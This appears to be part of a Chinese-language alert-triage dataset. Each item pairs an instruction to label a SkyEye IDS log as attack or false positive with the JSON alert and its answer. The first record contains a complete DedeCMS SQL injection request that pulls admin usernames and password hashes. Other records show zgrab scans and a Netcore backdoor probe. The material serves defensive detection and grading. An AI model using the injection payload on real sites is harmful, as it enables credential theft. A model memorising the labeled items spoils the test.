"R0VUIC9wbHVzL3JlY29tbWVuZC5waHA/YWN0aW9uPSZhaWQ9MSZfRklMRVMlNUJ0eXBlJTVEJTVCdG1wX25hbWUlNUQ9JTVDJTI3JTIwb3IlMjBtaWQ9QCU2MCU1QyUyNyU2MCUyMC8qITUwMDAwdW5pb24qLy8qITUwMDAwc2VsZWN0Ki8xLDIsMywoc2VsZWN0JTIwQ09OQ0FUKDB4N2MsdXNlcmlkLDB4N2MscHdkKStmcm9tKyU2MCUyM0BfX2FkbWluJTYwJTIwbGltaXQrMCwxKSw1LDYsNyw4LDklMjMmX0ZJTEVTJTVCdHlwZSU1RCU1Qm5hbWUlNUQ9MS5qcGcmX0ZJTEVTJTVCdHlwZSU1RCU1QnR5cGUlNUQ9YXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtJl9GSUxFUyU1QnR5cGUlNUQlNUJzaXplJTVEPTQyOTQgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wOyAuTkVUNC4wQzsgLk5FVDQuMEUpDQpSZWZlcmVyOiBodHRwOi8vd3d3Lmhuc2VlLmNuL3BsdXMvcmVjb21tZW5kLnBocD9hY3Rpb249JmFpZD0xJl9GSUxFU1t0eXBlXVt0bXBfbmFtZV09XCUyNyUyMG9yJTIwbWlkPUBgXCUyN2AlMjAvKiE1MDAwMHVuaW9uKi8vKiE1MDAwMHNlbGVjdCovMSwyLDMsKHNlbGVjdCUyMENPTkNBVCgweDdjLHVzZXJpZCwweDdjLHB3ZCkrZnJvbStgJTIzQF9fYWRtaW5gJTIwbGltaXQrMCwxKSw1LDYsNyw4LDklMjMmX0ZJTEVTW3R5cGVdW25hbWVdPTEuanBnJl9GSUxFU1t0eXBlXVt0eXBlXT1hcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0mX0ZJTEVTW3R5cGVdW3NpemVdPTQyOTQNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCxkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuLHpoLGVuDQpIb3N0OiB3d3cuaG5zZWUuY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hnsee.cn", "host_state": "失败", "accept-language": "zh-cn,zh,en", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_ead0a33412ab341f4fbd6f341a457a71", "access_time": "2024-11-27 18:46:23", "attack_addr": "中国--浙江省--丽水市(28.453939/119.918609)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "39.180.68.203", "dimension": "3", "url_path": "/plus/recommend.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "recommend.php", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /plus/recommend.php?action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-stream&_FILES%5Btype%5D%5Bsize%5D=4294 HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\r\nReferer: http://www.hnsee.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294\r\nAccept-Encoding: gzip,deflate\r\nAccept-Language: zh-cn,zh,en\r\nHost: www.hnsee.cn\r\nConnection: Keep-Alive\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440707-SQL注入攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"IE/11.0\", \"hw_type\": \"PC\"}}", "sport": "6497", "h_url": "/plus/recommend.php?action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-stream&_FILES%5Btype%5D%5Bsize%5D=4294"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732702882", "vlan_id": "", "vuln_type": "发现扫描工具-zgrab", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.222", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732702882, "vuln_harm": "攻击者可以利用该工具收集目标信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.222", "site_app": "", "hit_end": 69, "uri": "/", "dport": 443, "vuln_name": "发现扫描工具-zgrab", "rsp_status": 0, "code_language": "", "solution": "关闭不必要的端口。", "hit_start": 49, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "xff": "", "sip": "172.168.41.136", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "public_date": "2023-03-17 16:17:23", "sport": 56830}, "solution": "关闭不必要的端口。", "hit_start": "49", "skyeye_id": "", "payload": {"req_header": "R0VUIC8gSFRUUC8xLjENCkhvc3Q6IDExOS4zOS45Ni4xNDA6NDQzDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCB6Z3JhYi8wLngNCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "file_md5": "", "host": "119.39.96.140:443", "host_state": "失败", "rule_key": "webids", "api": "119.39.96.140:443/", "first_access_time": "2024-11-27 18:21:22", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国--纽约州--纽约", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现扫描工具-zgrab", "alarm_sip": "172.31.193.222", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "7ee241adb2a53f3ecaf1cc61f51bb3d0", "proto": "http", "xff": "", "alarm_id": "20241127_1af0af53026bf8e78173b0b942287e40", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "attack_chain": "0x01050000", "access_time": "2024-11-27 18:21:22", "attack_addr": "美国--纽约州--纽约(40.714550/-74.007141)", "type_chain": "140E0000", "vuln_harm": "攻击者可以利用该工具收集目标信息。", "dip_addr": "局域网", "dport": "443", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732702860", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "172.168.41.136", "public_date": "2023-03-17 16:17:23", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "69", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002098e", "req_header": "GET / HTTP/1.1\r\nHost: 119.39.96.140:443\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "172.168.41.136", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568974-发现扫描工具-zgrab", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "b88d750fae4e6345571942bce1c239e0", "sport": "56830", "h_url": "/", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 zgrab/0.x"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732702531", "vlan_id": "", "vuln_type": "发现扫描工具-zgrab", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.218", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732702531, "vuln_harm": "攻击者可以利用该工具收集目标信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.218", "site_app": "", "hit_end": 68, "uri": "/", "dport": 443, "vuln_name": "发现扫描工具-zgrab", "rsp_status": 0, "code_language": "", "solution": "关闭不必要的端口。", "hit_start": 48, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "xff": "", "sip": "172.206.143.92", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "public_date": "2023-03-17 16:17:23", "sport": 46712}, "solution": "关闭不必要的端口。", "hit_start": "48", "skyeye_id": "", "payload": {"req_header": "R0VUIC8gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS4xOTo0NDMNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIHpncmFiLzAueA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "file_md5": "", "host": "218.76.15.19:443", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.19:443/", "first_access_time": "2024-11-27 18:15:31", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国--纽约州--纽约", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现扫描工具-zgrab", "alarm_sip": "172.31.193.218", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "b36e6b7c817ab916d201ad38dfd84f33", "proto": "http", "xff": "", "alarm_id": "20241127_869435a7d573e054ea1df0a397ec215d", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "attack_chain": "0x01050000", "access_time": "2024-11-27 18:15:31", "attack_addr": "美国--纽约州--纽约(40.714550/-74.007141)", "type_chain": "140E0000", "vuln_harm": "攻击者可以利用该工具收集目标信息。", "dip_addr": "局域网", "dport": "443", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732702509", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "172.206.143.92", "public_date": "2023-03-17 16:17:23", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "68", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002098e", "req_header": "GET / HTTP/1.1\r\nHost: 218.76.15.19:443\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "172.206.143.92", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568974-发现扫描工具-zgrab", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "bf19e26533083fd22e5ef8ec307373a5", "sport": "46712", "h_url": "/", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 zgrab/0.x"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732702487", "vlan_id": "", "vuln_type": "Netcore 后门漏洞利用", "attack_type": "后门程序", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.30.81.14", "sip_group": "", "repeat_count": "1", "type": "后门程序", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732702487, "rule_name": "Netcore 后门漏洞利用", "hit_field": "", "description": "1", "dip": "172.30.81.14", "protocol_id": 17, "hit_end": 16, "uri": "", "cnnvd_id": "", "dport": 53413, "rule_version": "3.0.1122.14572", "hit_start": 0, "detail_info": "2014年,由国内电子厂商生产的一系列名为NetCore的路由器产品被爆存在高权限的后门,该后门可能会影响全球大约300万台NetCore系列路由器等设备。该后门被国外物联网僵尸网络Gafgyt家族利用,可以通过向 53413端口发送UDP请求来激活后门。", "packet_size": 60, "appid": 0, "proto": "udp", "xff": "", "sip": "139.162.33.189", "attack_method": "远程", "affected_system": "", "sig_id": 3597, "sport": 40553, "bulletin": "使用其他路由器设备代替该产品。"}, "hit_start": "0", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAAAt1DEAAOkRUwKLoiG9rB5RDp5p0KUAGQAAQUFBQUFBQUFuZXRjb3JlAAoA"}, "detail_info": "2014年,由国内电子厂商生产的一系列名为NetCore的路由器产品被爆存在高权限的后门,该后门可能会影响全球大约300万台NetCore系列路由器等设备。该后门被国外物联网僵尸网络Gafgyt家族利用,可以通过向 53413端口发送UDP请求来激活后门。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 18:14:47", "hazard_level": "6", "hazard_rating": "高危", "rule_name": "Netcore 后门漏洞利用", "packet_data": "ACSs3Z37AJShXm6HCABFAAAt1DEAAOkRUwKLoiG9rB5RDp5p0KUAGQAAQUFBQUFBQUFuZXRjb3JlAAoA", "hit_field": "", "sip_addr": "新加坡--新加坡--新加坡", "protocol_id": "17", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.30.81.14", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "a1b035d78081377d396ddd408652750c", "proto": "udp", "xff": "", "alarm_id": "20241127_89680b14fe4ad48682b1a38a0e750e50", "attack_chain": "0x01010000", "access_time": "2024-11-27 18:14:47", "attack_addr": "新加坡--新加坡--新加坡(1.286529/103.853519)", "type_chain": "14010000", "description": "1", "dip_addr": "局域网", "dport": "53413", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732702475", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "139.162.33.189", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "高", "super_type": "恶意软件", "super_attack_chain": "0x01000000", "hit_end": "16", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x5e1c", "attack_org": "", "is_white": "0", "packet_size": "60", "alarm_sample": "1", "appid": "0", "attack_sip": "139.162.33.189", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "24092-Netcore 后门漏洞利用", "rule_labels": "{\"dns\": {\"dns\": [{\"request\": \"\", \"answers\": [{\"type\": \"A\", \"data\": \"T1190\"}]}]}, \"0x100101\": {\"parent_id\": \"0x100100\", \"type\": \"设备类型\", \"name\": \"路由器\", \"parent_name\": \"设备安全\"}}", "sig_id": "3597", "host_md5": "", "sport": "40553", "bulletin": "使用其他路由器设备代替该产品。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732702369", "vlan_id": "", "vuln_type": "发现扫描工具-zgrab", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.68.230", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732702369, "vuln_harm": "攻击者可以利用该工具收集目标信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.230", "site_app": "", "hit_end": 68, "uri": "/", "dport": 18080, "vuln_name": "发现扫描工具-zgrab", "rsp_status": 0, "code_language": "", "solution": "关闭不必要的端口。", "hit_start": 48, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "xff": "", "sip": "172.206.143.92", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "public_date": "2023-03-17 16:17:23", "sport": 58494}, "solution": "关闭不必要的端口。", "hit_start": "48", "skyeye_id": "", "payload": {"req_header": "R0VUIC8gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS4zODo0NDMNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIHpncmFiLzAueA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "file_md5": "", "host": "218.76.15.38:443", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.38:443/", "first_access_time": "2024-11-27 18:12:49", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国--纽约州--纽约", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现扫描工具-zgrab", "alarm_sip": "172.23.68.230", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "caf1a06d4494c7b101f1226d8dc3bbff", "proto": "http", "xff": "", "alarm_id": "20241127_cef7c84ccd71a95cc72cccefb233b432", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "attack_chain": "0x01050000", "access_time": "2024-11-27 18:12:49", "attack_addr": "美国--纽约州--纽约(40.714550/-74.007141)", "type_chain": "140E0000", "vuln_harm": "攻击者可以利用该工具收集目标信息。", "dip_addr": "局域网", "dport": "18080", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732702348", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "172.206.143.92", "public_date": "2023-03-17 16:17:23", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "68", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002098e", "req_header": "GET / HTTP/1.1\r\nHost: 218.76.15.38:443\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "172.206.143.92", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568974-发现扫描工具-zgrab", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "7bfad7454d6b0eac57544dcb54d783a0", "sport": "58494", "h_url": "/", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 zgrab/0.x"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732702364", "vlan_id": "", "vuln_type": "发现扫描工具-zgrab", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732702364, "vuln_harm": "攻击者可以利用该工具收集目标信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.243", "site_app": "", "hit_end": 68, "uri": "/", "dport": 443, "vuln_name": "发现扫描工具-zgrab", "rsp_status": 0, "code_language": "", "solution": "关闭不必要的端口。", "hit_start": 48, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "xff": "", "sip": "172.206.143.92", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "public_date": "2023-03-17 16:17:23", "sport": 60268}, "solution": "关闭不必要的端口。", "hit_start": "48", "skyeye_id": "", "payload": {"req_header": "R0VUIC8gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS4xNzo0NDMNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIHpncmFiLzAueA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "file_md5": "", "host": "218.76.15.17:443", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.17:443/", "first_access_time": "2024-11-27 18:12:44", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国--纽约州--纽约", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现扫描工具-zgrab", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "bfd20e13f12ce1780a6d54d7f5216332", "proto": "http", "xff": "", "alarm_id": "20241127_84a705b597efacd14bfbd3b824e2cdaf", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "attack_chain": "0x01050000", "access_time": "2024-11-27 18:12:44", "attack_addr": "美国--纽约州--纽约(40.714550/-74.007141)", "type_chain": "140E0000", "vuln_harm": "攻击者可以利用该工具收集目标信息。", "dip_addr": "局域网", "dport": "443", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732702345", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "172.206.143.92", "public_date": "2023-03-17 16:17:23", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "68", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002098e", "req_header": "GET / HTTP/1.1\r\nHost: 218.76.15.17:443\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "172.206.143.92", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568974-发现扫描工具-zgrab", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "10784beb0a69a074223cac24c66efea9", "sport": "60268", "h_url": "/", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 zgrab/0.x"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732702361", "vlan_id": "", "vuln_type": "发现扫描工具-zgrab", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.192.179", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732702361, "vuln_harm": "攻击者可以利用该工具收集目标信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.192.179", "site_app": "", "hit_end": 68, "uri": "/", "dport": 443, "vuln_name": "发现扫描工具-zgrab", "rsp_status": 0, "code_language": "", "solution": "关闭不必要的端口。", "hit_start": 48, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "xff": "", "sip": "172.206.143.92", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "public_date": "2023-03-17 16:17:23", "sport": 41672}, "solution": "关闭不必要的端口。", "hit_start": "48", "skyeye_id": "", "payload": {"req_header": "R0VUIC8gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41Njo0NDMNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIHpncmFiLzAueA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "file_md5": "", "host": "218.76.15.56:443", 